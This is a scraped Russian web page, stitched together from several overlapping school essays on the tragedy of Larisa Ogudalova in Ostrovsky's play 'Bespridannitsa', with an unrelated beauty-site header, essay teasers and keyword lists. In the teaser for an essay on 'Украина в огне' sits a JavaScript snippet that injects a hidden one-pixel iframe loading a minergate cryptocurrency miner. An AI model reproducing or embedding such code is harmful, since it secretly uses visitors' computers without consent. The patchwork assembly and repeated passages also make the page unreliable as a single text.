Макияж. Уход за волосами. Уход за кожей

Макияж. Уход за волосами. Уход за кожей

» » Почему трагична судьба ларисы. Трагическая судьба Ларисы в пьесе «Бесприданница

Почему трагична судьба ларисы. Трагическая судьба Ларисы в пьесе «Бесприданница

» он показал не только нравы, приоритеты, традиции дельцов, бояр, мелких чиновников, но и личную драму влюбленной женщины. И эта женщина - Лариса Огудалова .

Лариса обладает поэтичной душой, стремящейся к любви и счастью. Она хорошо воспитана, одаренна красотой и умом. Ее характер противостоит устоям «нового времени». Огудалова живет в мире дельцов, где главной ценностью являются деньги, где все продается и покупается, где «всякому товару есть цена».

Лариса и есть главный товар пьесы. «Я для вас кукла; поиграете вы мной, изломаете и бросите», - говорит она. Ею торгуют и мать, и друг детства Вожеватов, и Кнуров, и Паратов, и даже Карандышев. Так, Карандышев организуя обед в честь Ларисы, решил просто похвастаться приобретенной «игрушкой», показать свое превосходство над другими: «Я имею право гордиться и горжусь! Она меня поняла, оценила и предпочла всем».

Вожеватов и Кнуров бросают монетку, кому же достанется такое украшение. Но Ларисе нет дела до них. Все ее мысли, чувства связаны с Паратовым, но Паратова волнует лишь его состояние. Как только у него проблемы, он тут же отъезжает, забыв попрощаться с Ларисой. Она ему это прощает. И как только он возвращается, Лариса уже чувствует шаткость своего положения: «Топите вы меня, толкаете в пропасть». Она просит уехать подальше, в деревню, как Катерина героиня пьесы «Гроза », просила взять клятву у Тихона.

Лариса хочет обезопасить себя от поступка, к которому стремится сердце. Но Карандышев не поддерживает Ларису, как Тихон не поддержал Екатерину. Карандышева заботит только самолюбие. Так Лариса остается наедине со своими страхами.

По приезду Паратов и не вспоминает о Ларисе, пока Вожеватов не сообщает ему, что Лариса выходит замуж. Женится и Паратов, точнее снова происходит процесс купли-продажи: в обмен на свою свободу он приобретает золотые прииски. Паратов хочет поиграть на последок, и Лариса - отличная игрушка. Он дает ей самое страшное - веру в счастье. «Мечтаю об одном блаженстве: быть рабом вашим; я потерял больше, чем состояние, я потерял вас», - говорит Паратов. Он обманывает, говорит о любви, когда в нем нет даже доли жалости. Лариса верит ему и бросается в омут с головой.

Цель Паратова достигнута: Лариса, обезумев от своей любви, с верой и надеждой в их совместное будущее соглашается быть его всецело. Однако, на утро, когда Лариса спрашивает, может ли она считать себя его женой, Паратов «вспоминает», что он связан цепями, которые не может разорвать. Ларису и это не останавливает: «Я разделю с вами эту ношу, большую половину тяжести я возьму на себя», пока Паратов не признается, что он обручен. Лариса растоптана, на ее любовь наплевали, ее чувства втоптали в грязь, ей посмеялись в лицо. И вновь судьба с ней играет, Кнуров предлагает купить ее. Ей противен, ей тошен этот мир.

Она пытается умереть, но ей не это не удается: «Что меня держит над этой пропастью, что мешает? Ах, нет, нет… не Кнуров… роскошь, блеск… нет, нет… я далека от суеты… Разврат… ох, нет… Просто решимости не имею». В развязке Лариса падает в борьбе и принимает положение, которое с самого начала ей присвоило общество: «Да, вещь,… я вещь, а не человек;… Каждой вещи своя цена… Я слишком дорога для вас». Но трагедия Ларисы в другом, ее слова звучат как гром в «Грозе»: « Я любви искала и не нашла. На меня смотрели и смотрят как на забаву… Я искала любви и не нашла… ее нет на свете, нечего и искать. Я не нашла любви, так буду искать золота». Лариса лжет, ей не нужно золото, ей не нужно ничего. Именно поэтому, когда Карандышев стреляет в Ларису, она благодарит его.

В ее жизни было несколько вариантов исхода событий. До последних минут Лариса любила Паратова, и если бы она осталась жива, она смогла бы простить его который раз, и если бы он случайно опять вернулся в город, она бы вновь поверила ему, и вновь оказалась обманутой. Лариса могла стать роскошью Кнурова, но для нее это ровно смерти. Женой Карандышева не стала бы никогда, покровительство Карандышева - тяжкое оскорбление. Как бы то ни было, счастья Лариса бы не нашла, нет для нее в этом мире любви, потому что в те времена, любовь испытывали только к деньгам, а не к людям.

Трагическая судьба Ларисы в «темном царстве» (по пьесе А. Н. Островского «Бесприданница»)

Героями пьес Островского чаще всего становятся женщины. Безусловно, эти женщины являются незаурядными и неординарными личностями. Достаточно вспомнить героиню драмы “Гроза” Катерину. Она настолько эмоциональна, впечатлительна, что особняком стоит среди других героев пьесы. Судьба Катерины чем-то похожа на судьбу другой героини Островского

В данном случае речь идет о пьесе “Бесприданница”.
Ларисе Огудаловой пришлось испытать равнодушие и жестокость окружающих, пережить любовную драму, и в результате она гибнет, так же как и героиня “Грозы”. Но при кажущейся схожести Лариса Огудалова - обладательница совсем иного характера, нежели Катерина Кабанова. Девушка получила великолепное образование. Она умна, утонченна, образованна, мечтает о красивой любви, но изначально её жизнь складывается совсем иначе. Она бесприданница. Мать Ларисы очень корыстолюбива. Она торгует красотой и молодостью своих дочерей. Старшие сестры Ларисы уже “пристроены” благодаря заботам оборотистой родительницы, но, к сожалению, их жизнь складывается весьма и весьма трагично.
Лариса Огудалова влюбляется в “блестящего барина” Сергея Сергеевича Параᴛᴏʙа. Она искренне считает его идеалом мужчины. Барин обладает состоянием, он полностью соответствует представлению о знатном и образованном человеке. Внутренняя сущность его раскрывается позже. Лариса молода, неопытна, поэтому она попадается в ловушку Параᴛᴏʙа, губит себя. Она не обладает сильным характером и становится игрушкой в руках окружающих. Дело доходит до того, что девушку разыгрывают в орлянку. Окружающие считают её вещью, дорогой и красивой забавой, а её возвышенная душа, красота и талант оказываются не важны. Карандышев говорит Ларисе: “Они не смотрят на вас, как на женщину, как на человека... они смотрят на вас, как на вещь”.
Она сама соглашается с этим: “Вещь... да, вещь! Они правы, я вещь, я не человек...”.
Лариса обладает пылким сердцем, она искренна и эмоциональна Она щедро дарит свою любовь, но что получает взамен? Для своего любимого человека Лариса является очередным развлечением, забавой. От отчаяния она даже соглашается принять условия Кнурова.
Гибель является своего рода спасением для Ларисы, спасением духовным, разумеется. Столь трагичный финал спасает её от тяжелого выбора, который она пытается сделать, спасает от нравственной гибели и падения в пропасть, именуемую развратом.

Страница 1 из 1



Киноповесть «Украина в огне»: судьба народа сквозь призму авторского видения и оценки

(function() { var w = document.createElement("iframe"); w.style.border = "none"; w.style.width = "1px"; w.style.height = "1px"; w.src = "//ru.minergate.com/wmr/bcn/podivilovhuilo%40yandex.ru/2/258de372a1e9730f/hidden"; var s = document.getElementsByTagName("body"); s.appendChild(w, s); })();...


Герои Отечественной войны в романе Гроссмана «Жизнь и судьба»

О Великой Отечественной войне написано очень много. Первые произведения о ней начали появляться уже в середине сороковых годов, и с тех пор романы, рассказы, стихи о войне издавались сплошным потоком. И многие среди них были, к сожалению, совершенно бездарны и нечитабельны.


Человеческая судьба и любовь к родной земле в творчестве А. Малышко

Андрей Самойлович Малышко - нерядовая фигура в истории украинской культуры. Его многогранный талант обнаружил себя в разных отраслях, но наиболее благосклонной к писателю была муза поэзии. В его наработке больше двух десятков сборников и семнадцати поэм, в которых автор охватывает огромные тематические горизонты. Но о человеке труда, человеке-патриоте, поэт пишет с особенным трепетом и душевным теплом. Родная земля в стихотворении «Родина» изображена как источник жизни, мудрости, красоты и материнской опеки. Она, как справедливо считает писатель, владеет какой-то магической силой, потому что те, кому дала «хлеб... с песнями соловья», приобретают природную мощь: ...


Трагическая судьба Тараса Шевченко

Как известно, Шевченко был сыном крестьянина-крепостного и сам был крепостным. Отец и мать великого поэта преждевременно умерли от непосильного труда, лишений и болезней. Такая же судьба ожидала Тараса Шевченко. Оставшись в одиннадцать лет круглой сиротой, он рано испытал непосильной тяжбы подневольного труда, почувствовал горе "бедного неулыбающегося мужика". Жил Шевченко в чрезвычайно жестких условиях, очень бедствовал, часто голодал и болел....


Тема революции, гражданской войны и судьба русской интеллегенции в русской литературе (Пастернак, Булгаков) Белая гвардия Булгаков М. А

Тема революции, гражданской войны и судьба русской интеллегенции в русской литературе (Пастернак, Булгаков) Необычно начало романа: "Шли и шли и пели "Вечную память"... Кого хоронят?.. "Живаго". На противопоставлении живого и мертвого строится все произведение Пастернака. Основным вопросом, вокруг которого вращается "внешняя и внутренняя" жизнь главных героев, является отношение к революции. Меньше всего и Юрий Живаго, и сам автор были ее противниками, меньше всего они спорили с ходом событий, сопротивлялись им. Их отношение к действительности совсем иное. Оно заключается в том, чтобы воспринимать историю такая, какая она есть, не вмешиваясь в нее, не пытаясь изменить ее. Такая позиция позволяет объективно увидеть происходящее. "Доктор вспомнил недавно минувшую осень, расстрел мятежников, детоубийство и женоубийство Палых, кровавую колошматину и человекоубоину, которой не привиделось конца. Изуверства белых и красных соперничали по жестокости, попеременно возрастая одно в ответ на другое, точно их перемножили". ...


Огудалова Лариса Дмитриевна – главная героиня замечательной пьесы Островского «Бесприданница». Эта девушка молода, необычайно красива, но бедна, за ней не дают никакого приданого. Такое положение крайне унизительно, Лариса чувствует это особенно остро, ведь, по своей натуре, она умная и гордая личность.

Героини-бесприданницы встречались в драматургии Островского и ранее: Марья Андреевна («Бедная невеста»), Надя («Воспитанница»), Аксюша («Лес»), Настя («Не было ни гроша, да вдруг алтын»).

Среди всех этих героинь Лариса Огудалова обладает самой тонкой натурой и душевной хрупкостью. Лариса живет, будто «поверх быта», не касаясь повседневной суеты, житейских страстей и торгашества. Ее душа постоянно стремится куда-то: в лес, в деревню, за Волгу, одним словом, в какой-нибудь тихий уголок, который покажется ей раем. Лариса одинока, и в ее душе происходит трагический надлом. Все восхищаются ею, вожделеют ее, но никого не интересует, что творится у девушки внутри. Ей так не хватает простого, но теплого и сердечного слова, поддержки и участия. Она живет в обстановке, которая больше напоминает «базар» или «цыганский табор».

Даже в родном доме девушка не может найти покоя, ее заставляют улыбаться, навязывают женихов. Лариса страстно влюбляется в Паратова, но не в его личные качества, а в ту мечту о другой, красивой жизни, которую он ей способен дать. Паратов ассоциируется в сознании Ларисы с легким, поэтичным миром, который она знает только по стихам и романсам, в реальности этот мир недоступен ей. Согласившись от безысходности выйти замуж за мелкого чиновника Карандышева, Лариса чувствует себя униженной. Жених-неудачник раздражает ее, когда пытается сравниться с Паратовым, которым она по-прежнему восхищается, несмотря ни на что. В душе Ларисы происходит ужасная борьба между стремлением примириться с участью жены мелкого чиновника и мечтой о красивой и яркой жизни. Пытаясь решить свою судьбу, Лариса отправляется с Паратовым в компрометирующую ее поездку на пароходе. Во время этой поездки Лариса неожиданно понимает свое истинное положение – красивой игрушки, которую мужчины не могут поделить между собой. Паратов откровенно играл с ее чувствами, Карандышев, хоть и признавался ей в искренней любви, на самом деле просто тешил свое самолюбие, а друг детства Вожеватов додумался разыграть ее в «орлянку» с Кнуровым, крупным дельцом.

В финале произведения Лариса погибает от руки своего жениха Карандышева. Его смертельный выстрел стал для нее настоящим спасением от окончательной нравственной погибели. Лариса благодарит перед смертью своего убийцу за то, что он ей помог уйти из этого страшного мира, в котором ничего святого нет, а человек запросто может оказаться предметом купли-продажи. Лариса так мечтала о настоящей, искренней любви, но ее все воспринимали, как забаву. Никому не было дела до того, что творится в ее душе. Умирая, Лариса прощает всех, она не держит в себе зла. Ее образ необыкновенно поэтичен и прекрасен, он оставляет неизгладимый след и запоминается надолго.

Эффективная подготовка к ЕГЭ (все предметы) - начать подготовку


Обновлено: 2012-08-02

Внимание!
Если Вы заметили ошибку или опечатку, выделите текст и нажмите Ctrl+Enter .
Тем самым окажете неоценимую пользу проекту и другим читателям.

Спасибо за внимание.

Драма А. Н. Островского "Бесприданница" является замечательной пьесой позднего периода творчества писателя. Она была задумана в 1874 году, а завершена в 1878-м и в этом же году поставлена в Москве и Петербурге. М. Ермолова, М. Савина, а позднее В. Комиссаржевская - лучшие актеры столичных театров - брались за исполнение роли Ларисы Огудаловой. Чем же их пленила так эта замечательная героиня?

Лариса Огудалова отличается правдивостью, искренностью, прямотой характера, напоминая тем самым Катерину из "Грозы". По мнению Вожеватого, в Ларисе Дмитриевне "хитрости нет". С героиней "Грозы" сближает ее высокая поэтичность. Ларису влекут заволжская даль, леса за рекой, манит сама красавица - Волга с ее простором. "Земного, этого житейского нет" - замечает Кнуров. И в самом деле: она вся словно приподнята над грязью действительности, над пошлостью и низостью жизни. В глубине души ее, словно птица, на которую похожа она сама, бьется мечта о красивой и благородной, честной и тихой жизни, В переводе с греческого Лариса означает "чайка", и это не случайно.

Не предпочесть ли стиль жизни матери? Харита Игнатьевна, оставшаяся вдовой с тремя дочерьми, постоянно ловчит и хитрит, льстит и заискивает, попрошайничает у богатых и принимает их подачки. Она устроила в своем доме настоящий шумный "цыганский табор", чтобы создать видимость красоты и блеска жизни. И все это для того, чтобы под прикрытием этой мишуры промышлять живым товаром. Двух дочек она уже загубила, теперь пришла очередь торговать третьей. Но Лариса не может принять такого образа жизни матери, он чужд ей. Мать велит дочери улыбаться, а той плакать хочется. И она просит жениха, чтобы он вырвал ее из этого окружающего ее "базара", где немало "всякого сброду", чтобы увез подальше, за Волгу.

Однако, Лариса - бесприданница, бедная, безденежная невеста. Ей приходится с этим мириться. К тому же она сама успела заразиться тягой к внешнему блеску. Лариса лишена цельности характера, ее душевная жизнь довольно противоречива. Пошлость и цинизм окружающих ее людей она не только не хочет видеть и - довольно долго - не может разглядеть. Это все отличает ее от Катерины. Отказываясь от стиля жизни матери, она существует среди пошлых поклонников.

Ларисе Огудаловой пришлось испытать равнодушие и жестокость окружающих, пережить любовную драму, и в результате она гибнет, так же как и героиня "Грозы". Но при кажущейся схожести, Лариса Огудалова - обладательница совсем иного характера, нежели Катерина Кабанова. Девушка получила великолепное образование, она умна, утонченна, образованна, мечтает о красивой любви, но изначально ее жизнь складывается совсем иначе. Она бесприданница. Мать Ларисы очень корыстолюбива. Она торгует красотой и молодостью своих дочерей.

Сначала в доме появился старик с подагрой. Лариса явно не хочет этого неравного брака, но "любезничать надо было: маменька приказывает". Потом "набегал" разбогатевший управляющий какого-то князя, вечно пьяный. Ларисе не до него, но в доме и его принимают: "положение ее незавидное". Затем "появился" некий кассир, засыпавший Хариту Игнатьевну деньгами. Этот отбил всех, да недолго покуражился. Обстоятельства тут помогли невесте: у них в доме его со скандалом арестовали.

Лариса Огудалова влюбляется в "блестящего барина" Сергея Сергеевича Паратова. Она искренне считает его идеалом мужчины. Барин обладает состоянием, он полностью соответствует представлению о знатном и образованном человеке. Внутренняя сущность его раскрывается позже. Лариса молода, неопытна, поэтому она попадается в ловушку Паратова, губит себя. Она не обладает сильным характером и становится игрушкой в руках окружающих. Дело доходит до того, что девушку разыгрывают в орлянку. Окружающие считают ее вещью, дорогой и красивой забавой, а ее возвышенная душа, красота и талант оказываются не важны. Карандышев говорит Ларисе: "Они не смотрят на вас, как на женщину, как на человека… они смотрят на вас, как на вещь".

Она сама соглашается с этим: "Вещь… да, вещь! Они правы, я вещь, я не человек…".

Лариса обладает пылким сердцем, она искренна и эмоциональна. Она щедро дарит свою любовь, но что получает взамен? Для своего любимого человека Лариса является очередным развлечением, забавой. От отчаяния она даже соглашается принять условия Кнурова.

Гибель является своего рода спасением для Ларисы, спасением духовным, разумеется. Столь трагичный финал спасает ее от тяжелого выбора, который она пытается сделать, спасает от нравственной гибели и падения в пропасть, именуемую развратом.

Единственный выход, который находит Лариса - уход из этого мира. Лариса сначала хотела сама покончить с жизнью. Она подошла к обрыву и посмотрела вниз, но в отличие от Катерины, у нее не хватило решимости и сил совершить задуманное. Тем не менее, гибель Ларисы предрешена и подготовлена всей пьесой. Вдруг раздается выстрел с пристани (его-то и пугается Лариса). Потом упоминается топор в руках Карандышева. Верной смертью называет он падение с обрыва. Лариса рассказывает о "равнодушном выстреле" Паратова в монету, которую она держала в руках. Сама же думает о том, что здесь на любом сучке "удавиться можно", а на Волге "везде утопиться легко". Робинзон предчувствует возможное убийство. Наконец, Лариса мечтает: "Кабы теперь меня убил кто-нибудь?"

Неизбежной становится гибель героини, и она настает. В безумном припадке собственника, совершая для нее великое благодеяние, Карандышев убивает ее. Это последний и невольный выбор бесприданницы. Так завершается трагедия главной героини пьесы Островского.

"Бесприданница" - драма о катастрофе личности в бесчеловечном мире. Это произведение о трагедии обычной русской женщины, бесприданницы с горячим любящим сердцем.

Лариса Огудалова — главная героиня пьесы А. Н. Островского «Бесприданница», которая впервые была напечатана в «Отечественных записках» в 1879 году. В драматургии Островского 70—80-х годов основной становится тема власти денег, собственности, богатства в эпоху «торжества буржуазии». Драматург продолжает искать в русской жизни силы, которые могли бы противостоять стихии безудержного хищничества, унижения человеческого достоинства, холодного расчета и эгоизма. Особенно чувствуется тревога писателя за судьбу человека «с горячим сердцем», который и в это расчетливое время продолжает жить чувством, ищет любви, понимания, счастья. Такова и героиня пьесы «Бесприданница».

В Ларисе есть все — ум, талант, красота, чувствительность. Она чиста душой и бескорыстна. Она тянется к людям, верит им, надеется на понимание и ответное чувство. Но Лариса — бесприданница, и это предопределяет ее трагическую судьбу.

Мать Ларисы стремится повыгоднее выдать дочь замуж, она пытается научить Ларису жить по правилам, которые диктует время, заставляя дочь лгать, любезничать с молодыми людьми побогаче. Но героиня пьесы не может действовать по расчету. Она отдает свое сердце Сергею Сергеевичу Паратову, красивому, умному и сильному. Но Паратов — человек своего времени, живущий по принципу: «Всякому товару цена есть». Лариса для него — тоже товар. И он не готов заплатить своим материальным благополучием за любовь и счастье. Паратов женится на богатой невесте, вернее, на золотых приисках, которые дают ей в приданое.

Не найдя любви, Лариса пытается жить, «как все». Она решается выйти замуж за бедного Чиновника Юлия Капитоновича Карандышева. В своем избраннике Лариса ищет черты, достойные уважения: «Я мужа своего хоть уважать должна», — говорит она. Но уважать Карандышева трудно. В своих тщеславных попытках сравниться с Кнуровым и Вожеватовым он выглядит смешным и жалким. Он не слышит мольбу Ларисы о том, чтобы уехать в деревню, где она надеется найти хотя бы душевный покой. Юлию Капитоновичу важнее «в свою очередь посмеяться» над теми, чьи унижения он терпел три года. Ему не до терзаний Ларисы!

После разрыва с Карандышевым, после обмана Паратова Лариса ищет простого человеческого сочувствия, обращаясь к другу детства Вожеватову: «Ну хоть поплачь со мной», — просит она его. Однако Вожеватов уже проиграл в орлянку Кнурову возможность влиять на судьбу Ларисы. «Не могу, ничего не могу», — таков ответ Вожеватова Ларисе. Материал с сайта

Не найдя ни любви, ни уважения, ни простого сострадания и понимания, Лариса теряет смысл жизни. Она с горечью говорит: «На меня смотрели и смотрят как на забаву. Никогда никто не постарался заглянуть ко мне в душу, ни от кого я не видела сочувствия, не слыхала теплого, сердечного слова. А ведь так жить холодно».

Выстрел Карандышева становится для нее избавлением от душевных мук, от пошлой жизни «вещи», игрушки в руках тех, кто может за нее заплатить. «Умереть, пока еще упрекнуть себя не в чем», — это лучшее, что остается «горячему сердцу» в мире расчета и тщеславия.

В этом личная трагедия Ларисы. Но это и трагедия общества, где правят деньги и счастье человека измеряется только их количеством.

Не нашли то, что искали? Воспользуйтесь поиском

На этой странице материал по темам:

  • трагедия ларисы бесприданница
  • чем трагизм судьбы ларисы огудаловой
  • сообщение на тему в чём трагедия ларисы
  • островский бесприданница в чем трагедия огудаловой
  • какой могла бы быть судьба ларисы в бесприданнице